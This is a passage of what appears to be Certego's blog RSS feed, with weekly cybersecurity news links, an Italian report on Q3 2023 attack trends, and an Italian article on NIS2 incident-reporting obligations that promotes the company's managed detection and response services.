&lt;p&gt;The document, created in collaboration with the Italian Privacy Guarantor, is the first in a series that will help protect the cyberspace.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.difesaesicurezza.com/difesa-e-sicurezza/cybersecurity-acn-pubblica-le-linee-guida-sulla-conservazione-delle-password/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;NIST (National Institute of Standards and Technology) calls for information to support safe, secure and trustworthy development and use of Artificial Intelligence&lt;/h2&gt;
&lt;h3&gt;#Artificial Intelligenge&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.nist.gov/news-events/news/2023/12/nist-calls-information-support-safe-secure-and-trustworthy-development-and&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - December 15th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-december-15/</link><guid isPermaLink="false">weekly-highlights-december-15</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 14 Dec 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;MITRE launches Critical Infrastructure Threat Model Framework&lt;/h2&gt;
&lt;h3&gt;#Research&lt;/h3&gt;
&lt;p&gt;EMB3D is the new threat model framework for defenders tasked with protecting operational technology (OT) and industrial control systems (ICS).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.darkreading.com/ics-ot-security/mitre-debuts-ics-cyber-threat-modeling-embedded-systems&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;CISA and ENISA signed a Working Arrangement in the areas of capacity-building, best practices exchange and boosting cybersecurity awareness&lt;/h2&gt;
&lt;h3&gt;#Cybersecurity Cooperations&lt;/h3&gt;
&lt;p&gt;CISA and ENISA have signed a collaboration agreement on cybersecurity.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.enisa.europa.eu/news/cisa-and-enisa-enhance-their-cooperation&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Microsoft&apos;s Digital Crimes Unit seized multiple domains used by the Vietnam-based cybercrime group Storm-1152&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;Storm-1152 registered over 750 million fraudulent accounts and raked in millions of dollars by selling them online to other cybercriminals.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-seizes-domains-used-to-sell-fraudulent-outlook-accounts/#google_vignette&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Cybercrime market OLVX gains popularity among hackers&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;A new cybercrime marketplace, OLVX, has emerged and is quickly gaining new customers looking to purchase tools to conduct online fraud and cyberattacks. &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/new-cybercrime-market-olvx-gains-popularity-among-hackers/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;White House wants to set minimum cyber standards for hospitals and healthcare&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The sector has faced a wave of ransomware linked to the critical CitrixBleed vulnerability, which has led to major attacks from LockBit and other threat groups.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.cybersecuritydive.com/news/biden-minimum-cyber-standards-healthcare/702129/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Cybercrime: l’altra faccia della digitalizzazione]]></title><description><![CDATA[State of cybersecurity]]></description><link>https://www.certego.net/blog/cybercrime-altra-faccia-della-digitalizzazione/</link><guid isPermaLink="false">cybercrime-altra-faccia-della-digitalizzazione</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Wed, 13 Dec 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Il 2023 ha fatto registrare un rapido aumento dei crimini informatici. All’accelerazione del processo di digitalizzazione che stiamo vivendo corrisponde l’aumento dei rischi informatici a cui siamo esposti. Una maggiore vulnerabilità che spesso non è accompagnata da una maggiore consapevolezza di essere bersagli per il cybercrime.
La sicurezza delle aziende è costantemente messa alla prova da nuove tipologie di minacce. È fondamentale avere a disposizione dati tangibili sull’andamento della sicurezza informatica per fare cultura e progettare nuove strategie di difesa.&lt;/p&gt;
&lt;p&gt;Per questo Certego e &lt;strong&gt;AUSED&lt;/strong&gt; – Associazione tra Utenti di Sistemi e Tecnologie dell’Informazione – hanno unito le forze e dato vita al report periodico &lt;strong&gt;State of cybersecurity&lt;/strong&gt;.
180 aziende italiane per un totale di 1.200.000 asset monitorati all’interno della piattaforma MDR Certego PanOptikon®, questi i numeri del campione analizzato dalla ricerca condotta da Certego per conto di AUSED.&lt;/p&gt;
&lt;p&gt;L’obiettivo dell’ultimo numero del report è confrontare i volumi degli attacchi informatici del terzo trimestre del 2023 con lo stesso periodo dell’anno precedente e analizzare l’evoluzione dello stato di sicurezza delle aziende italiane.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Come cresce il fenomeno&lt;/h2&gt;
&lt;p&gt;Nel trimestre in esame gli eventi di cybersecurity monitorati da Certego sono aumentati in modo consistente.
Gli allarmi – eventi di cybersecurity che hanno passato le prime linee di difesa preventive e che in seguito all’applicazione automatica di regole di Threat Intelligence hanno generato un allarme all’interno della piattaforma MDR Certego PanOptikon® – sono aumentati del 13%. Mentre i veri e propri incidenti – allarmi che in seguito alle attività di analisi del Detection &amp;#x26; Response hanno richiesto attività immediate di Incident Response – sono cresciuti del 17%.
Dato ancora più significativo quello legato alla severità, o cioè il livello di pericolosità, di un incidente.&lt;/p&gt;
&lt;p&gt;Il terzo trimestre del 2023 registra un aumento di tutti i livelli; in particolare, vi è stata una crescita percentuale più elevata dei tentativi di attacco con severità 3, 4 e 5, quelli potenzialmente più pericolosi per le aziende.
Questo conferma come gli attacchi stiano sempre più puntando verso asset strategici, i criminali informatici studiano sempre di più le aziende prima di attaccarle.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1468px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/68537bc04f3cba6a71b7ccfe7328d69c/e4ba2/Severity-attacchi.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 51.302083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAABYlAAAWJQFJUiTwAAABZ0lEQVR42mVRu07EMBDM//MnSIgCCiREQUfHSUDFhRy5kITYucTxK/EjZuwDcYgpVrMr7+7sOAsnWFPkcv4kbGCSHvhhFB2d+gNf1zX8Q7YsC+dcCDFN05hwiBgIoX3fgyFQSocf4LFSChGNGUZ67xGdc1JKwTmi1hpUayWk+CZCKhAl3fF1QpbUrmgwxpwcsNrFqNkG7633anEgozYCJPweEJsxqe5HyAbfvr3d5l0w5vz65nLHg5kv7h/uqJdtdXZ1/8jWYHRBJ2HjhCgbIj/qumla5OPIukmg+FE3VGhnbVHux9loKV7LStp1VjJvqXY+NuMEGNN1HbxBDjNgUZzC2MQYyDCMUggQSqgxS3xPiHfuW/af30r+xVuSL6fEpQbAWnusZMcEC3FzWZbv7+UuYbvdFkWBCnix2+V5vt/vq6rCJ83zfFwQm5EQQiC7bdu6rp8SNpvN8w9eEpqmIQmMMewLIXwB1K44/pTz4cgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Severity degli attacchi&quot;
        title=&quot;&quot;
        src=&quot;/website/static/68537bc04f3cba6a71b7ccfe7328d69c/e4ba2/Severity-attacchi.png&quot;
        srcset=&quot;/website/static/68537bc04f3cba6a71b7ccfe7328d69c/804b2/Severity-attacchi.png 384w,
/website/static/68537bc04f3cba6a71b7ccfe7328d69c/e5715/Severity-attacchi.png 768w,
/website/static/68537bc04f3cba6a71b7ccfe7328d69c/e4ba2/Severity-attacchi.png 1468w&quot;
        sizes=&quot;(max-width: 1468px) 100vw, 1468px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Con riferimenti ai settori merceologici, rispetto all’anno precedente, gli eventi che hanno scatenato problemi di sicurezza informatica sono aumentati in tutti i comparti monitorati.
Servizi, Finanza e Manifattura hanno registrato un aumento dei tentativi di attacco superiore al 50%.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Chi è sotto attacco?&lt;/h2&gt;
&lt;p&gt;Oltre alle grandi aziende e alle impresse ad alto coefficiente tecnologico, oggi gli attacchi si dirigono anche verso le società piccole e non strettamente connesse, come aree di business, al digital che spesso sono più vulnerabili ed esposte.&lt;/p&gt;
&lt;p&gt;Rispetto allo stesso periodo del 2022, si registra un aumento del 31% dei tentativi di attacco verso le PMI rispetto ad un +13% per le grandi aziende.
Il processo di digitalizzazione, in corso anche nelle piccole e medie imprese, porta a un aumento del numero di dispositivi connessi alla rete, ampliando così i potenziali punti di accesso per i criminali informatici.
Questa maggiore esposizione spesso non si accompagna ad una crescita proporzionale della consapevolezza del rischio.&lt;/p&gt;
&lt;p&gt;Come sottolineato nell’indagine svolta da Ipsos per Certego e 24ORE Business School, pubblicata negli scorsi mesi (&lt;a href=&quot;https://www.certego.net/blog/indagine-ipsos-cybersecurity-2023/&quot;&gt;Indagine IPSOS per Certego&lt;/a&gt;), vi è una bassa percezione del rischio informatico (le aziende si sentono sicure). Questo può comportare una sottovalutazione del rischio e, di conseguenza, una carenza nelle procedure di sicurezza predisposte.&lt;/p&gt;
&lt;p&gt;La tendenza di crescita degli attacchi, inoltre, coinvolge sia le aziende private che quelle pubbliche.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Nessun confine&lt;/h2&gt;
&lt;p&gt;Il rischio informatico non ha confini, limiti nazionali o continentali. Ci troviamo di fronte ad un fenomeno globale che connette la nostra economia e le nostre imprese con il resto del mondo.&lt;/p&gt;
&lt;p&gt;Nel terzo trimestre del 2023, sulla base dei dati analizzati da Certego, la Cina si posiziona al primo posto per la provenienza degli attacchi, seguita dagli Stati Uniti.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f3b8d0520d423337c381d775d463f2a6/6a5c3/Provenienza-attacchi.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 46.61458333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAABYlAAAWJQFJUiTwAAABNklEQVR42n1RuU7DQBDN19JQIPgBKkRHS4doqPgEJDqEEikohpBEASIgxA72Lvb6mL1mN0wcKxxBPI1Gc73VzNvWoob3izUilj9H6UuUzhLxFouQF9NYzHmx2EBrs1RoTCUK1VgmMVNYGvcX2eFUQIdpSqz7vsFv+J9Wkz12QnEQZJQgkddw3jlPFXrRorPruA6otVrbDzjstPnZY34ZwhxsYVDa5fT/aMgPqdq6Yrttvn3N9jp8/+bjMMiO+tnxUJyM89NxcT4pL2bQTVSPq4Dr19IqdI1glcERl5NMPaVyxGHIoc/gjsEtg15cdd+XFiRwz+WAAa05YCWrdEOm8xCR7tBKobHWWKO1NeQUeaPIayUlyUA9pAIADX99FZ1ARzi3lLu2WjISxpNaSDFi06Kitbj6qk+1GgORIujIKwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Provenienza degli atacchi&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f3b8d0520d423337c381d775d463f2a6/71c1d/Provenienza-attacchi.png&quot;
        srcset=&quot;/website/static/f3b8d0520d423337c381d775d463f2a6/804b2/Provenienza-attacchi.png 384w,
/website/static/f3b8d0520d423337c381d775d463f2a6/e5715/Provenienza-attacchi.png 768w,
/website/static/f3b8d0520d423337c381d775d463f2a6/71c1d/Provenienza-attacchi.png 1536w,
/website/static/f3b8d0520d423337c381d775d463f2a6/6a5c3/Provenienza-attacchi.png 1646w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Analizzare la provenienza degli attacchi è fondamentale per poter sviluppate azioni mirate di risposta. Attraverso attività di Cyber Threat Intelligence, che includono la raccolta, l’elaborazione e l’analisi di grandi quantità di dati sulle minacce e le tendenze della sicurezza informatica, è possibile: rafforzare la sicurezza aziendale tramite la comprensione dell’avversario; anticipare in modo proattivo gli attaccanti; rispondere più velocemente in caso di incidente e prendere decisioni strategiche per il futuro, investendo il budget in modo profittevole.
Nell’attuale paradigma della sicurezza informatica, la Cyber Threat Intelligence rappresenta un vantaggio competitivo per tutte le imprese.
Le PMI possono trarre vantaggio dai dati di intelligence per raggiungere un livello di protezione molto più avanzato. Per le aziende più grandi, che hanno già al loro interno un team di sicurezza, i dati di intelligence rappresentano un vantaggio tangibile per ridurre i costi attraverso l’ottimizzazione dei processi di cybersecurity.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/blog/whitepaper-state-of-cybersecurity-h3/&quot;&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAAChElEQVR42j2SWWsTURTH82X8GPrsg1IRKlF880FsQfQhLUVcUtvSUgVRKFqoKEVBsViLSmwTW9OkzdYsTZvMTGYmk1nurE1VUrQpzt8zsXjhf+85585wlvsLWbbTtV2363p7Xdf1/ss5VhD3SIEdfGtadlfTjS4zrZ5/rEOK/6FzP0Qb5GYTuxyHWiBewA4vQRAl8I0Gdup1VGscuIYIg5mgBKCfwUgO2YFvO66/194Pzk5IUTWsbiQxNvMAfQMXMTI9iOHHUYSjEzh3+z4uTz3ChdFpnI5E8XltHUzTwHM8ZErYEHgosgxJFP2mJIEZrBPSdB28yCOT3USlWqYqRPB8HLNLH3Dy5h30X72B8PURnAgP4l0sgfhGHvMf41hKZvFiaRlvlpNY/Jry52Nr2NzhOyHdMCCrKtKFCvLVOkqcjPZBF8Far9QwNjaKyakIzg5cwad4ArxuI8spKAtNFIQWthWGbVn3cw0NtaZGLbdUMMfGryOfdISD34domQyCxiDpJt7G3mN+YQ7DDyewmkpDUAwUeRnlhoKaQt0pGjRN8y3G4Nh2JyQrLeTLJcD3UagWkKtkkC6m0X93nOb3BJfGJzHydAanhu5hIZHEtZSNM18Y+hMm+lZMhJdVKJrhm6YFw7L/PUquVMLs61cYmhzFSiqOiZlxDE9HcD46hVuzc3i5uIDIs+eIpTJoMBdbko4iaUumTqw2vL22//3HTxBOnVCAQIBDgM1unaPyWQ8fSSZs6CUDXARR7GEUJPccB45lwbNtaDT7b5kc8oUtP5vLg8bX6XFI/PR4okxkO/C8NhyXfIo5dEcQo9cSJaYqehwS6GipOuJrSRRLZT+5noKqap2/t4ymBvt/RYsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Scarica il Report:&quot;
        title=&quot;&quot;
        src=&quot;/website/static/30a7ecad074f5b827c779454d36b543c/71c1d/cover-state-of-cybersecurity-Q3.png&quot;
        srcset=&quot;/website/static/30a7ecad074f5b827c779454d36b543c/804b2/cover-state-of-cybersecurity-Q3.png 384w,
/website/static/30a7ecad074f5b827c779454d36b543c/e5715/cover-state-of-cybersecurity-Q3.png 768w,
/website/static/30a7ecad074f5b827c779454d36b543c/71c1d/cover-state-of-cybersecurity-Q3.png 1536w,
/website/static/30a7ecad074f5b827c779454d36b543c/a878e/cover-state-of-cybersecurity-Q3.png 2048w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
    &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Allineamento alla Direttiva NIS2]]></title><description><![CDATA[L’importanza dei servizi di Incident Response per prepararsi agli aggiornamenti sulla conformità]]></description><link>https://www.certego.net/blog/nis2-importanza-dei-servizi-di-incident-response/</link><guid isPermaLink="false">nis2-importanza-dei-servizi-di-incident-response</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[NIS2]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 11 Dec 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;#1-direttiva-nis2-aggiornata&quot;&gt;Direttiva NIS2 aggiornata&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-nis2-si-applica-a-pi%C3%B9-settori-industriali&quot;&gt;NIS2, si applica a più settori industriali&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-i-cambiamenti-chiave-dalla-nis-alla-nis2&quot;&gt;I cambiamenti chiave, dalla NIS alla NIS2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-gestione-e-reportistica-degli-incidenti&quot;&gt;Gestione e reportistica degli incidenti&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#5-gestione-e-reportistica-degli-incidenti-con-i-servizi-mdr-certego&quot;&gt;Gestione e reportistica degli incidenti con i servizi MDR Certego&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#6-whitepaper&quot;&gt;Whitepaper&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;1. Direttiva NIS2 aggiornata&lt;/h2&gt;
&lt;p&gt;Nel gennaio 2023, gli Stati membri dell&apos;UE hanno formalmente emanato una &lt;strong&gt;revisione della Direttiva&lt;/strong&gt; sulla sicurezza delle reti e dei sistemi informatici (Network and Information Systems - NIS) 2016.&lt;/p&gt;
&lt;p&gt;La direttiva NIS2 aggiornata è stata progettata per &lt;strong&gt;ampliare il campo di applicazione dell&apos;originale&lt;/strong&gt;. Concepita in risposta a diversi cyber attacchi ampiamente pubblicizzati e dannosi, la Direttiva NIS2 rafforza i requisiti di sicurezza, razionalizza gli obblighi di reportistica e introduce misure di supervisione più rigide e requisiti di applicazione più rigorosi.&lt;/p&gt;
&lt;p&gt;La nuova Direttiva intende rafforzare le difese delle entità critiche contro le vulnerabilità della supply chain, gli attacchi ransomware e altre minacce informatiche.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tutti i 27 Stati membri dell’EU sono tenuti a ratificare la Direttiva NIS2 entro ottobre 2024&lt;/strong&gt;.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;2. NIS2, si applica a più settori industriali&lt;/h2&gt;
&lt;p&gt;La direttiva NIS2 verrà applicata a un insieme più ampio e approfondito di entità critiche rispetto a quanto attualmente coperto dalla Direttiva NIS. &lt;strong&gt;Comprende nuovi settori e definisce due diversi tipi di entità critiche: essenziali e importanti&lt;/strong&gt;.
Gli obblighi sono gli stessi per entrambe, ma quelle essenziali sono soggette a misure di applicazione e sanzioni più rigorose.&lt;/p&gt;
&lt;p&gt;La Direttiva NIS2 si applica a qualsiasi entità che fornisca servizi critici all’interno di un paese membro UE, indipendentemente da dove si trova tale entità.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Organizzazioni essenziali:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Sanità&lt;/li&gt;
&lt;li&gt;Energia&lt;/li&gt;
&lt;li&gt;Trasporti&lt;/li&gt;
&lt;li&gt;Finanza&lt;/li&gt;
&lt;li&gt;Approvvigionamento idrico&lt;/li&gt;
&lt;li&gt;Bancario&lt;/li&gt;
&lt;li&gt;ICT&lt;/li&gt;
&lt;li&gt;Acque reflue&lt;/li&gt;
&lt;li&gt;Salute (farmaci, R&amp;#x26;S, dispositivi medici critici)&lt;/li&gt;
&lt;li&gt;Spaziale&lt;/li&gt;
&lt;li&gt;Amministrazione pubblica&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Organizzazioni importanti&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Servizi postali e corrieri espresso&lt;/li&gt;
&lt;li&gt;Chimico&lt;/li&gt;
&lt;li&gt;Alimentare&lt;/li&gt;
&lt;li&gt;Manifatturiero&lt;/li&gt;
&lt;li&gt;Digital Provider (piattaforme di social networking, motori di ricerca, marketplace online)&lt;/li&gt;
&lt;li&gt;Servizi postali e corrieri espresso&lt;/li&gt;
&lt;li&gt;Gestione dei rifiuti&lt;/li&gt;
&lt;li&gt;Organizzazioni di ricerca&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h2&gt;3. I cambiamenti chiave, dalla NIS alla NIS2&lt;/h2&gt;
&lt;p&gt;L&apos;articolo 21 del NIS2 obbliga gli Stati membri a garantire che le entità essenziali e importanti gestiscano il rischio implementando sistemi, policy e best practice efficaci che coprano un&apos;ampia gamma di misure e discipline di cybersecurity, tra cui:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Analisi dei rischi e sicurezza dei sistemi informatici;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Gestione e reportistica degli incidenti&lt;/strong&gt;;&lt;/li&gt;
&lt;li&gt;Continuità operativa, come la gestione dei backup e il ripristino di emergenza;&lt;/li&gt;
&lt;li&gt;Gestione delle crisi;&lt;/li&gt;
&lt;li&gt;Sicurezza della supply chain;&lt;/li&gt;
&lt;li&gt;Sicurezza nell&apos;acquisizione, sviluppo e manutenzione dei sistemi;&lt;/li&gt;
&lt;li&gt;Pratiche di base per la cyber-igiene (vedere la definizione riportata di seguito) e formazione sulla cybersecurity;&lt;/li&gt;
&lt;li&gt;Tecnologie di crittografia e cifratura;&lt;/li&gt;
&lt;li&gt;Sicurezza delle risorse umane, policy di controllo degli accessi e gestione delle risorse;&lt;/li&gt;
&lt;li&gt;Accesso Zero Trust (autenticazione multifattore, autenticazione continua).&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;4. Gestione e reportistica degli incidenti&lt;/h2&gt;
&lt;p&gt;La direttiva NIS2 impone ad ogni entità critica, obblighi di notifica per gli incidenti che hanno un &quot;impatto significativo&quot; sulla fornitura dei loro servizi. Queste notifiche devono essere effettuate presso l&apos;autorità competente o il CSIRT (Computer Security Incident Response Team) pertinente.&lt;/p&gt;
&lt;h3&gt;Obblighi di notifica multi-livello:&lt;/h3&gt;
&lt;h4&gt;Early Warning&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Entro 24 ore dal momento in cui si viene a conoscenza dell&apos;incidente&lt;/strong&gt;.
Sarà necessario indicare se si sospetta che l&apos;incidente significativo sia causato da atti illeciti o dolosi, o possa avere un impatto transfrontaliero.&lt;/p&gt;
&lt;h4&gt;Official Incident Notification&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Entro 72 ore dall&apos;inizio dell&apos;incidente&lt;/strong&gt;
Aggiornamento delle informazioni precedentemente fornite, indicando una valutazione iniziale dell&apos;incidente significativo, compresi la gravità e l&apos;impatto, nonché, se disponibili, gli indicatori di compromissione.&lt;/p&gt;
&lt;h4&gt;Intermediate Status Report&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Su richiesta del CSIRT o dell&apos;autorità competente pertinente&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;Final Report&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Entro un mese dall&apos;inizio dell&apos;incidente&lt;/strong&gt;.
Se l&apos;incidente è in corso al momento della relazione finale, verrà presentata una relazione di avanzamento e la relazione finale sarà fornita un mese dopo. Redazione di una relazione finale che comprende:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;descrizione dettagliata dell&apos;incidente, compresi la gravità e l&apos;impatto;&lt;/li&gt;
&lt;li&gt;il tipo di minaccia o la causa principale che probabilmente ha scatenato l&apos;incidente;&lt;/li&gt;
&lt;li&gt;le misure di mitigazione applicate e in corso;&lt;/li&gt;
&lt;li&gt;nel caso, l&apos;impatto transfrontaliero dell&apos;incidente.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;h2&gt;5. Gestione e reportistica degli incidenti con i servizi MDR Certego&lt;/h2&gt;
&lt;p&gt;I servizi gestiti di sicurezza informatica erogati da Certego si basano su un modello adattivo che, partendo dalle attività di Prevenzione, è in grado di gestire ogni fase di un incidente informatico.&lt;/p&gt;
&lt;h3&gt;PanOptikon® Cybersecurity Platform&lt;/h3&gt;
&lt;p&gt;La piattaforma di cybersecurity PanOptikon® è la soluzione SaaS che consente al Team di Detection &amp;#x26; Response di semplificare i processi di rilevamento e risposta agli attacchi e migliorare l’interazione tra Certego e il cliente.&lt;/p&gt;
&lt;h3&gt;Detection &amp;#x26; Response Team&lt;/h3&gt;
&lt;p&gt;Il Team di Detection and Response include analisti, incident responders e investigatori forensi per identificare, analizzare e rispondere alle minacce informatiche.
Fornisce un supporto tempestivo con raccomandazioni per il contenimento, l&apos;eradicazione, il ripristino e la resilienza 24/7/365.&lt;/p&gt;
&lt;h3&gt;Threat Intelligence&lt;/h3&gt;
&lt;p&gt;Un Team dedicato in grado di garantire informazioni in tempo reale sulle potenziali minacce, fornendo un dettaglio sulle motivazioni e le tattiche utilizzate dagli attaccanti.
Attraverso l’analisi delle TTP (Tactics, Techniques, Procedures) utilizzate dagli attaccanti, la piattaforma di intelligence sulle minacce di Certego fornisce al cliente dati aggiornati sulle più moderne minacce alla sicurezza informatica.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;6. Whitepaper&lt;/h2&gt;
&lt;h3&gt;Scopri come i servizi gestiti di Incident Response di Certego ti permettono, di essere conforme agli obblighi di Gestione e reportistica degli incidenti introdotti dal NIS2.&lt;/h3&gt;
&lt;p&gt;Il Whitepaper mostra un esempio pratico di come i servizi gestiti di Incident Response di Certego ti permettono di essere conforme agli obblighi di notifica multi-livello richiesti dalla normativa NIS2, in ogni fase di un attacco.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/blog/whitepaper-nis2/&quot;&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
